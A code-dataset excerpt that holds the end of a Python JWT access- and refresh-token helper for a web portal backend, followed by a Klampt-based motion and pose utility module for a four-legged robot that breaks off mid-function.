VAllUsersApplications = VAllUsersApplications.join(TApplications)\n VAllUsersApplications = VAllUsersApplications.join(\n TAutorisations,\n TInstance.TIns_PK_ID == TAutorisations.TAut_FK_TInsID\n )\n VAllUsersApplications = VAllUsersApplications.join(TRoles)\n VAllUsersApplications = VAllUsersApplications.join(TUsers)\n VAllUsersApplications = VAllUsersApplications.join(\n TSite,\n TInstance.TIns_FK_TSitID == TSite.TSit_PK_ID\n )\n\n VAllUsersApplications = VAllUsersApplications.with_entities(*colsToRet)\n\n VAllUsersApplications = VAllUsersApplications.filter(\n (TSite.TSit_Name == tsiteName),\n (TUsers.TUse_PK_ID == idUser),\n (TRoles.TRol_Label != 'Interdit')\n )\n VAllUsersApplications = VAllUsersApplications.order_by(\n TInstance.TIns_Order\n )\n\n result = VAllUsersApplications.all()\n\n now = datetime.datetime.now()\n nowInTimeStampSeconds = int(now.timestamp())\n\n payload = {\n \"iss\": str(result[0].TUse_PK_ID), # TODO replace by 'NSPortal', after all app compatible with auth proces\n \"sub\": str(result[0].TUse_PK_ID),\n \"username\": result[0].TUse_Login,\n \"userlanguage\": result[0].TUse_Language,\n 'exp': nowInTimeStampSeconds + timeAddForExp,\n \"roles\": {\n row.TIns_Label: row.TRol_Label for row in result\n }\n }\n\n return payload\n\n\ndef getAccessToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='accessTokenSecret',\n algoKey='accessTokenAlgorithm'\n )\n\n payload = buildPayload(\n idUser=idUser,\n request=request,\n timeAddForExp=_accessTokenExpInSec\n )\n\n return myEncode(payload, secret, algorithm=algorithm)\n\n\ndef getRefreshToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='refreshTokenSecret',\n algoKey='refreshTokenAlgorithm'\n )\n\n now = datetime.datetime.now()\n nowInTimeStampSeconds = int(now.timestamp())\n\n payload = {\n 'sub': str(idUser),\n 'exp': nowInTimeStampSeconds + _refreshTokenExpInSec\n }\n\n return myEncode(payload, secret, algorithm=algorithm)\n","sub_path":"Back/ns_portal/utils/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"165607086","text":"import time\nfrom scipy import optimize\nfrom klampt import vis\nfrom shapely.geometry import LineString\nimport numpy as np\nfrom klampt.math import so3\nfrom klampt.model.collide import WorldCollider\nfrom src.utils.logger import Logger\nfrom src.utils.geometry_objects._2d_circle_geometry import LegRange\nfrom src.utils.geometry_objects._2d_triangle_geometry import SupportTriangle\nfrom shapely.geometry import Point\nfrom src.utils.math_utils import MathUtils\nfrom src.utils.vis_utils import VisUtils\nfrom src.utils.data_objects.height_map import HeightMap\nfrom src.utils import project_constants\n\nclass RobotPose:\n\n def __init__(self, fl, fr, br, bl, torso_xyz_yawdeg):\n self.fl, self.fr, self.br, self.bl, self.torso_xyz_yawdeg = fl, fr, br, bl, torso_xyz_yawdeg\n\n def update_end_effectors(self,fl, fr, br, bl):\n self.fl, self.fr, self.br, self.bl = fl, fr, br, bl\n\n def get_moving_leg_xyzR(self,moving_leg):\n if moving_leg == 1: return self.fl\n if moving_leg == 2: return self.fr\n if moving_leg == 3: return self.br\n if moving_leg == 4: return self.bl\n\n def update_moving_legs_xyz(self, moving_leg, xyz):\n if moving_leg == 1: self.fl = xyz\n if moving_leg == 2: self.fr = xyz\n if moving_leg == 3: self.br = xyz\n if moving_leg == 4: self.bl = xyz\n\n def update_torso_xyz_yaw_deg(self,torso_xyz_yawdeg):\n self.torso_xyz_yawdeg = torso_xyz_yawdeg\n\n def debug(self):\n print(\"\\nRobotPose debug\")\n VisUtils.visualize_cost(self.fl[0],self.fl[1],.25,\"front left\")\n VisUtils.visualize_cost(self.fr[0],self.fr[1],.25,\"front right\")\n VisUtils.visualize_cost(self.br[0],self.br[1],.25,\"back right\")\n VisUtils.visualize_cost(self.bl[0],self.bl[1],.25,\"back left\")\n VisUtils.visualize_cost(self.torso_xyz_yawdeg[0], self.torso_xyz_yawdeg[1], .25, \"torso\",with_z=self.torso_xyz_yawdeg[2])\n print(\" Front Left:\",Logger.pp_list(self.fl), \"len:\",len(self.fl))\n print(\" Front Right:\",Logger.pp_list(self.fr), \"len:\",len(self.fr))\n print(\" Back Right:\",Logger.pp_list(self.br), \"len:\",len(self.br))\n print(\" Back Left:\",Logger.pp_list(self.bl), \"len:\",len(self.bl))\n print(\" Torso:\",Logger.pp_list(self.torso_xyz_yawdeg),\"\\n\")\n\n\nclass Constraints:\n\n def __init__(self, support_triangles, range_circles):\n self.support_triangles = support_triangles\n self.range_circles = range_circles\n\n def get_xy_centroid(self):\n if len(self.support_triangles) >= 1:\n if len(self.support_triangles) >=2:\n o_support_tris = self.support_triangles[1:]\n o_3d_objs = o_support_tris + self.range_circles\n return self.support_triangles[0].xy_centroid_from_o_3dgeoms(o_3d_objs)\n else:\n return self.support_triangles[0].xy_centroid_from_o_3dgeoms(self.range_circles)\n\n def xy_in_support_area(self, x, y, ignore_range_tris=False):\n if ignore_range_tris:\n if len(self.support_triangles) == 1:\n return self.support_triangles[0].point_is_inside([x, y])\n else:\n Logger.log(\"Multiple support triangle point inside detection unimplemented, exiting\", \"FAIL\")\n return \"this should throw an error\"\n support_objs = self.get_all_objects()\n return support_objs[0].point_is_inside_o_3d_geoms([x,y,.25], support_objs)\n\n def number_constraints(self):\n return len(self.support_triangles) + len(self.range_circles)\n\n def debug(self):\n print(\"\\n\",len(self.support_triangles),\"support triangles,\",len(self.range_circles),\"range circles\")\n for i in range(len(self.support_triangles)):\n print(\" support tri\",i,\":\")\n for i in range(len(self.range_circles)):\n print(\" range_circles\", i,\" has centroid at:\",Logger.pp_list([self.range_circles[i].x,self.range_circles[i].y]))\n\n def get_all_objects(self):\n ret = []\n for tri in self.support_triangles:\n ret.append(tri)\n for rcircle in self.range_circles:\n ret.append(rcircle)\n return ret\n\n def get_support_triangles(self):\n return self.support_triangles\n\n def get_range_circles(self):\n return self.range_circles\n\n def visualize_support_tri(self):\n for support_tri in self.support_triangles:\n support_tri.visualize()\n\n def remove_support_tri_visualization(self):\n for support_tri in self.support_triangles:\n support_tri.remove_visualization()\n\n def visualize_range_circles(self):\n for circle in self.range_circles:\n circle.visualize()\n\n def remove_range_circle_visualizations(self):\n for circle in self.range_circles:\n circle.remove_visualization()\n\n def visualize_all(self, hm=None):\n self.visualize_range_circles()\n self.visualize_support_tri()\n\n def remove_all_visualizations(self):\n self.remove_range_circle_visualizations()\n self.remove_support_tri_visualization()\n\n\nclass MotionUtils:\n\n def __init__( self, world, height_map: HeightMap, scatter_list, state_path, gradient_map, u_input=None,\n include_ik_solver=False, lidar_mode=False):\n \n self.u_input = u_input\n self.gradient_map = gradient_map\n self.scatter_list = scatter_list\n self.stance_path = state_path\n self.world = world\n self.robosimian = world.robot(0)\n self.bl_end_effector = self.robosimian.link(project_constants.BL_ACTIVE_DOFS[len(project_constants.BL_ACTIVE_DOFS) - 1])\n self.br_end_effector = self.robosimian.link(project_constants.BR_ACTIVE_DOFS[len(project_constants.BR_ACTIVE_DOFS) - 1])\n self.fl_end_effector = self.robosimian.link(project_constants.FL_ACTIVE_DOFS[len(project_constants.FL_ACTIVE_DOFS) - 1])\n self.fr_end_effector = self.robosimian.link(project_constants.FR_ACTIVE_DOFS[len(project_constants.FR_ACTIVE_DOFS) - 1])\n self.torso = self.robosimian.link(project_constants.TORSO_LINK_INDEX)\n self.height_map = height_map\n if include_ik_solver:\n from .ik_solver_utils import IKSolverUtils\n self.collider = WorldCollider(self.world)\n self.IKSolverUtil = IKSolverUtils(world, height_map, self.scatter_list, self.stance_path, gradient_map)\n\n def countdown(self,t):\n for i in range(t):\n i = t-i\n for j in range(i):\n print(\".\", end=' ')\n print()\n time.sleep(1)\n\n def debug_visualize_stance(self, stance_idx, constraint_obj: Constraints, visualize=False, debug=False):\n\n stance_state = self.stance_path[stance_idx]\n try:\n stance_state_next = self.stance_path[stance_idx + 1]\n\n except IndexError:\n # Logger.log(\"error inbound\",\"FAIL\")\n stance_state_next = None\n\n fl_xyz, fr_xyz, br_xyz, bl_xyz = self.get_end_affector_xyzs_from_curr_stance(stance_state)\n try:\n fl_xyz_next, fr_xyz_next, br_xyz_next, bl_xyz_next = self.get_end_affector_xyzs_from_curr_stance(stance_state_next)\n except TypeError:\n return\n\n moving_leg = self.get_moving_leg_from_stance_idx(stance_idx)\n\n if debug:\n print(f\"stance idx:{stance_idx}/{len(self.stance_path)} stance_state:\", self.stance_path[stance_idx], f\"\\t\\ttorso xy: {Logger.pp_list(self.robosimian.getConfig()[0:3])}\")\n print()\n\n # msg = \"Step distance for fl end effector: \" + Logger.pp_double(\n # MathUtils._3d_euclidian_distance(self.fl_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n # msg = \"Step distance for fr end effector: \" + Logger.pp_double(MathUtils._3d_euclidian_distance(\n # self.fr_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n # msg = \"Step distance for br end effector: \" + Logger.pp_double(\n # MathUtils._3d_euclidian_distance(self.br_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n # msg = \"Step distance for bl end effector: \" + Logger.pp_double(MathUtils._3d_euclidian_distance(\n # self.bl_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n\n # debugging\n diag_dist_2d = -1\n diag_dist_3d = -1\n # tri = #[fl_xyz, fr_xyz, br_xyz, bl_xyz]\n tri = constraint_obj.get_support_triangles()[0]\n if moving_leg == 1:\n diag_dist_2d = MathUtils._2d_euclidian_distance(fl_xyz, br_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(fl_xyz, br_xyz)\n # tri.remove(fl_xyz)\n elif moving_leg == 2:\n # tri.remove(fr_xyz)\n diag_dist_2d = MathUtils._2d_euclidian_distance(fr_xyz, bl_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(fr_xyz, bl_xyz)\n elif moving_leg == 3:\n # tri.remove(br_xyz)\n diag_dist_2d = MathUtils._2d_euclidian_distance(br_xyz, fl_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(br_xyz, fl_xyz)\n elif moving_leg == 4:\n # tri.remove(bl_xyz)\n diag_dist_2d = MathUtils._2d_euclidian_distance(bl_xyz, fr_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(bl_xyz, fr_xyz)\n\n # inscribed_circX, inscribed_circY, inscribed_circR = MathUtils.incenter_circle_xy_R_fromT(tri)\n inscribed_circX, inscribed_circY, inscribed_circR = tri.incenterx, tri.incentery, tri.incenterr\n inscribed_circZ = self.height_map.height_at_xy(inscribed_circX, inscribed_circY)\n\n moving_leg_to_com_dist_curr_2d = -1\n moving_leg_to_com_dist_next_2d = -1\n moving_leg_to_com_dist_curr_3d = -1\n moving_leg_to_com_dist_next_3d = -1\n\n com_diag_line = tri.get_diag_linestring()\n\n if moving_leg == 1:\n\n # com_diag_line = LineString([bl_xyz[0:2], fr_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([fl_xyz[0:2], [inscribed_circX, inscribed_circY]])\n\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(fl_xyz, [intersection_pt.x, intersection_pt.y])\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(fl_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([fl_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(fl_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(fl_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(fl_xyz, [intersection_pt.x, intersection_pt.y], name=\"daig_com_dist\")\n VisUtils.visualize_line(fl_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(fl_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n elif moving_leg == 2:\n # com_diag_line = LineString([fl_xyz[0:2], br_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([fr_xyz[0:2], [inscribed_circX, inscribed_circY]])\n\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_ptxy = [intersection_pt.x, intersection_pt.y]\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(fr_xyz, intersection_ptxy)\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(fr_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([fr_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(fr_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(fr_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(fr_xyz, intersection_ptxy, name=\"daig_com_dist\")\n VisUtils.visualize_line(fr_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(fr_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n elif moving_leg == 3:\n\n # com_diag_line = LineString([bl_xyz[0:2], fr_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([br_xyz[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(br_xyz, [intersection_pt.x, intersection_pt.y])\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(br_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([br_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(br_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(br_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(br_xyz, [intersection_pt.x, intersection_pt.y], name=\"daig_com_dist\")\n VisUtils.visualize_line(br_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(br_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n elif moving_leg == 4:\n # com_diag_line = LineString([fl_xyz[0:2], br_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([bl_xyz[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(bl_xyz, [intersection_pt.x, intersection_pt.y])\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(bl_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([bl_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(br_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(br_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(bl_xyz, [intersection_pt.x, intersection_pt.y], name=\"daig_com_dist\")\n VisUtils.visualize_line(bl_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(bl_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n if visualize:\n vis.setColor(\"daig_com_dist\", 1, 0, 0, a=1.0)\n VisUtils.visualize_circle(inscribed_circX, inscribed_circY, inscribed_circR, \"inscribed_circle\", hm=self.height_map)\n vis.setColor(\"D1_3d\", 1, 0, 1, a=1.0)\n\n if debug:\n print(\n f\"moving leg: {moving_leg} \\tincenter r: {round(inscribed_circR, 3)}\"\n # f\" 2d_diag dist: {round(diag_dist_2d, 3)} \\n\"\n f\" 3d_diag dist: {round(diag_dist_3d, 3)} \\n\"\n # f\" moving_leg_to_com_dist_curr_2d: {round(moving_leg_to_com_dist_curr_2d, 3)}\\n\"\n f\" moving_leg_to_com_dist_curr_3d: {round(moving_leg_to_com_dist_curr_3d, 3)}\\n\"\n # f\" moving_leg_to_com_dist_next_2d: {round(moving_leg_to_com_dist_next_2d, 3)}\\n\"\n f\" moving_leg_to_com_dist_next_3d: {round(moving_leg_to_com_dist_next_3d, 3)}\")\n #\n # if moving_leg_to_com_dist_curr_3d > moving_leg_to_com_dist_curr_2d:\n # print(f\"moving_leg_to_com_dist_curr_3d > moving_leg_to_com_dist_curr_2d: {round(moving_leg_to_com_dist_curr_3d,4)} > {round(moving_leg_to_com_dist_curr_2d,4)}\")\n #\n # if moving_leg_to_com_dist_next_3d > moving_leg_to_com_dist_next_2d:\n # print(f\"moving_leg_to_com_dist_next_3d > moving_leg_to_com_dist_next_2d: {round(moving_leg_to_com_dist_next_3d,4)} > {round(moving_leg_to_com_dist_next_2d,4)}\")\n\n def skip_to_stance(self, stance_idx):\n self.j = 1\n self.i = 1\n self.torso_inside_new_support_tri = False\n self.curr_stance_idx = stance_idx\n self.curr_stance = self.stance_path[self.curr_stance_idx]\n self.robot_pose = self.get_robot_pose_from_stance(self.curr_stance, with_end_effector_Rs=True)\n self.IKSolverUtil.set_pose_w_R(self.robot_pose)\n\n def manual_torso_control(self):\n c = .0025\n while not self.u_input.exit():\n self.test_for_collisions(self.collider)\n dx, dy = self.u_input.get_direction(c)\n self.update_torso_com_line()\n torso_xyz_yaw_deg = self.robot_pose.torso_xyz_yawdeg\n torso_xyz_yaw_deg[0] += dx\n torso_xyz_yaw_deg[1] += dy\n self.robot_pose.update_torso_xyz_yaw_deg(torso_xyz_yaw_deg)\n self.IKSolverUtil.set_pose_w_R(self.robot_pose)\n time.sleep(.01)\n return\n\n def test_for_collisions(self,collider):\n for i, j in collider.collisionTests():\n if i[1].collides(j[1]):\n print(\"Object\", i[0].getName(), \"collides with\", j[0].getName())\n\n def get_end_effector_from_end_effector_number(self, end_effector):\n if end_effector == 4:\n return self.bl_end_effector\n elif end_effector == 3:\n return self.br_end_effector\n elif end_effector == 1:\n return self.fl_end_effector\n elif end_effector == 2:\n return self.fr_end_effector\n else:\n msg = \"Error finding: \"+str(end_effector)\n Logger.log(msg, \"FAIL\")\n return False\n\n def get_end_effector_current_xyzs(self):\n fl_xyz = self.fl_end_effector.getWorldPosition([0, 0, 0])\n fr_xyz = self.fr_end_effector.getWorldPosition([0, 0, 0])\n br_xyz = self.br_end_effector.getWorldPosition([0, 0, 0])\n bl_xyz = self.bl_end_effector.getWorldPosition([0, 0, 0])\n return fl_xyz, fr_xyz, br_xyz, bl_xyz\n\n def get_end_effector_current_xyzRs(self):\n fl_xyz, fr_xyz, br_xyz, bl_xyz = self.get_end_effector_current_xyzs()\n fl_R = self.fl_end_effector.getTransform()[0]\n fr_R = self.fr_end_effector.getTransform()[0]\n br_R = self.br_end_effector.getTransform()[0]\n bl_R = self.bl_end_effector.getTransform()[0]\n fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR = fl_xyz+[fl_R], fr_xyz+[fr_R], br_xyz+[br_R], bl_xyz+[bl_R]\n return fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR\n\n def estimate_torso_xy_yaw_rads_from_stance(self, stance):\n\n if self.scatter_list == None:\n Logger.log(\"Error: self.scatter_list has not been initialized\", \"FAIL\")\n\n fl_xyzc, fr_xyzc, br_xyzc, bl_xyzc = self.get_end_affector_xyzs_from_curr_stance(stance)\n x_ave = (fl_xyzc[0] + fr_xyzc[0] + bl_xyzc[0] + br_xyzc[0]) / 4.0\n y_ave = (fl_xyzc[1] + fr_xyzc[1] + bl_xyzc[1] + br_xyzc[1]) / 4.0\n right_side_v = np.array([fr_xyzc[0] - br_xyzc[0], fr_xyzc[1] - br_xyzc[1]])\n left_side_v = np.array([fl_xyzc[0] - bl_xyzc[0], fl_xyzc[1] - bl_xyzc[1]])\n right_side_normalized_v = right_side_v / np.linalg.norm(right_side_v)\n left_side_normalized_v = left_side_v / np.linalg.norm(left_side_v)\n ave_v = left_side_normalized_v + right_side_normalized_v\n yaw_rads = np.arctan2(ave_v[1], ave_v[0])\n return x_ave, y_ave, yaw_rads\n\n def get_torso_xy_yawdeg_from_stance(self, stance):\n x_ave, y_ave, yaw_rads = self.estimate_torso_xy_yaw_rads_from_stance(stance)\n return [x_ave, y_ave, np.rad2deg(yaw_rads)]\n\n def get_end_affector_xyzs_from_curr_stance(self, stance):\n\n if self.scatter_list == None:\n Logger.log(\"Error: self.scatter_list has not been initialized\", \"FAIL\")\n fl_xyz = self.scatter_list[int(stance[0])][0:3]\n fr_xyz = self.scatter_list[int(stance[1])][0:3]\n br_xyz = self.scatter_list[int(stance[2])][0:3]\n bl_xyz = self.scatter_list[int(stance[3])][0:3]\n return fl_xyz, fr_xyz, br_xyz, bl_xyz\n\n def get_active_dofs_from_end_effector(self, end_effector):\n if end_effector == 1:\n return project_constants.FL_ACTIVE_DOFS\n elif end_effector == 2:\n return project_constants.FR_ACTIVE_DOFS\n elif end_effector == 3:\n return project_constants.BR_ACTIVE_DOFS\n elif end_effector == 4:\n return project_constants.BL_ACTIVE_DOFS\n else:\n msg = \"Error finding: \"+str(end_effector)\n Logger.log(msg, \"FAIL\")\n return False\n\n def get_shoulder_from_end_effector(self, end_effector):\n if not end_effector in [1, 2, 3, 4]:\n print_str = \"Error: \"+str(end_effector)+\" unrecognized\"\n Logger.log(print_str, \"FAIL\")\n return\n if end_effector == 4:\n end_effector = self.robosimian.link(project_constants.BL_ACTIVE_DOFS[0])\n elif end_effector == 3:\n end_effector = self.robosimian.link(project_constants.BR_ACTIVE_DOFS[0])\n elif end_effector == 1:\n end_effector = self.robosimian.link(project_constants.FL_ACTIVE_DOFS[0])\n else:\n end_effector = self.robosimian.link(project_constants.FR_ACTIVE_DOFS[0])\n return end_effector\n\n def update_torso_com_line(self):\n torso_xyz = self.robosimian.getConfig()[0:3]\n ground_xyz = [torso_xyz[0], torso_xyz[1], self.height_map.height_at_xy(torso_xyz[0],torso_xyz[1])]\n VisUtils.visualize_line(torso_xyz, ground_xyz, \"torso com\")\n\n def print_robot_config(self):\n print(Logger.pp_list(self.robosimian.getConfig()))\n\n def get_constraint_obj(self, stance_idx, moving_leg=None, visualize=True):\n current_support_tri = self.get_support_triangle_from_stance_idx(stance_idx)\n if moving_leg:\n range_circles = self.get_end_effector_range_circles(stance_idx, visualize=False)\n else:\n range_circles = self.get_end_effector_range_circles(stance_idx, only_include_current_holds=True, visualize=False)\n constraint_obj = Constraints([current_support_tri], range_circles)\n if visualize:\n constraint_obj.visualize_all()\n\n return constraint_obj\n\n def get_moving_leg_xyz_0(self, moving_leg, stance_idx):\n return self.adjust_endeff_z(self.scatter_list[self.stance_path[stance_idx][moving_leg - 1]])\n\n def get_moving_leg_xyz_f(self, moving_leg, stance_idx):\n return self.adjust_endeff_z(self.scatter_list[self.stance_path[stance_idx + 1][moving_leg - 1]])\n\n def get_robot_pose_from_current_stance(self,with_end_eff_R=False):\n current_torso_xyz_yaw = self.get_current_torso_xyz_yaw_deg()\n fl, fr, br, bl = self.get_end_effector_current_xyzs()\n if with_end_eff_R:\n fl += [self.fl_end_effector.getTransform()[0]]\n fr += [self.br_end_effector.getTransform()[0]]\n br += [self.br_end_effector.getTransform()[0]]\n bl += [self.fl_end_effector.getTransform()[0]]\n r_pose = RobotPose(fl, fr, br, bl, current_torso_xyz_yaw)\n return r_pose\n\n def update_rpose_from_current_stance(self, rpose):\n fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR = self.get_end_effector_current_xyzRs()\n torso_xyz_yawdeg = self.get_current_torso_xyz_yaw_deg()\n rpose.update_end_effectors(fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR)\n rpose.update_torso_xyz_yaw_deg(torso_xyz_yawdeg)\n\n def get_robot_pose_from_stance(self, stance, with_end_effector_Rs=False, debug=False, visualize_normal=True):\n fl, fr, br, bl = self.get_end_affector_xyzs_from_curr_stance(stance)\n fl, fr, br, bl = self.adjust_all_end_effector_zs(fl, fr, br, bl)\n estimated_torso_xy_yaw = self.estimate_torso_xy_yaw_rads_from_stance(stance)\n torso_z = self.get_torso_z_des_from_xy(estimated_torso_xy_yaw, stance, debug=debug)\n estimated_torso_xyz_yaw = [estimated_torso_xy_yaw[0], estimated_torso_xy_yaw[1], torso_z, np.rad2deg(estimated_torso_xy_yaw[2]) ]\n if with_end_effector_Rs:\n fl_xyzR = fl + [self.get_end_effector_rotation_matrix( 1, xyz=fl, visualize_normal=visualize_normal, debug=debug)]\n fr_xyzR = fr + [self.get_end_effector_rotation_matrix( 2, xyz=fr, visualize_normal=visualize_normal, debug=debug)]\n br_xyzR = br + [self.get_end_effector_rotation_matrix( 3, xyz=br, visualize_normal=visualize_normal, debug=debug)]\n bl_xyzR = bl + [self.get_end_effector_rotation_matrix( 4, xyz=bl, visualize_normal=visualize_normal, debug=debug)]\n r_pose = RobotPose(fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR, estimated_torso_xyz_yaw)\n else:\n r_pose = RobotPose(fl, fr, br, bl, estimated_torso_xyz_yaw)\n return r_pose\n\n def adjust_all_end_effector_zs(self,fl, fr, br, bl):\n return self.adjust_endeff_z(fl), self.adjust_endeff_z(fr),self.adjust_endeff_z(br),self.adjust_endeff_z(bl)\n\n def get_moving_leg_xyzR_f(self, moving_leg: int, stance_idx: int, visualize_normal=False):\n return self.get_moving_leg_xyzR_0(moving_leg, stance_idx + 1, visualize_normal=visualize_normal)\n\n def get_moving_leg_xyzR_0(self, moving_leg: int, stance_idx: int, visualize_normal=False):\n ''' Assumes class has a gradient map'''\n xyz = self.get_moving_leg_xyz_0(moving_leg, stance_idx)\n R = self.get_end_effector_rotation_matrix(moving_leg, xyz=xyz, visualize_normal=visualize_normal)\n return xyz + [R]\n\n def get_end_effector_rotation_matrix(self, end_effector, xyz=None, yaw_rad=None, visualize_normal=False, debug=False):\n upright = [0, 0, -1, 0, 1, 0, 1, 0, 0]\n if end_effector in [1, 4]:\n upright = [0, 0, -1, 0, -1, 0, -1, 0, 0]\n if xyz:\n xyz[2] -= project_constants.END_EFFECTOR_HEIGHT\n x_grad, y_grad = self.gradient_map.get_grad_at_world_xy(xyz[0], xyz[1])\n x_grad /= 2 * project_constants.HM_X_GRANULARITY; y_grad /= 2 * project_constants.HM_Y_GRANULARITY\n normal = [x_grad, y_grad, 1 ]\n normal_magnitude = MathUtils._3d_vector_magnitude(normal)\n if normal_magnitude > .0001:\n normal /= MathUtils._3d_vector_magnitude(normal)\n else:\n normal = [0,0,1]\n end_effector_vector = [0,0,1]\n axis = MathUtils._3d_vector_cross_product(normal, end_effector_vector)\n angle = -MathUtils.angle_between_two_3d_vectors(normal, end_effector_vector)\n axis_magnitude = MathUtils._3d_vector_magnitude(axis)\n if axis_magnitude > .0001:\n axis /= axis_magnitude\n rotation_R = so3.from_axis_angle((axis,angle))\n R = so3.mul(rotation_R, upright)\n if visualize_normal:\n VisUtils.visualize_line(\n xyz, [xyz[0] + normal[0], xyz[1] + normal[1], xyz[2] + normal[2]], \"unit normal for {end_effector}\")\n if not so3.is_rotation(R): Logger.log(\"Failure - calculated matrix is NOT a rotation matrix\", \"FAIL\")\n xyz[2] += project_constants.END_EFFECTOR_HEIGHT\n if debug:print(\"for end effector:\",end_effector,\"at xyz:\",Logger.pp_list(xyz),\" normal:\",normal,\"R:\",Logger.pp_list(R))\n return R\n else:\n if yaw_rad is None:\n yaw_rad = self.get_current_torso_yaw_rads()\n yaw_rotation_aa = ([0, 0, 1], yaw_rad)\n yaw_rotation_R = so3.from_axis_angle(yaw_rotation_aa)\n R = so3.mul(yaw_rotation_R, upright)\n return R\n\n def get_linear_mid_motion_xyzR(self, xyzR0, xyzRf, i, imax):\n\n xyz0 = xyzR0[0:3]\n xyzf = xyzRf[0:3]\n xyz = 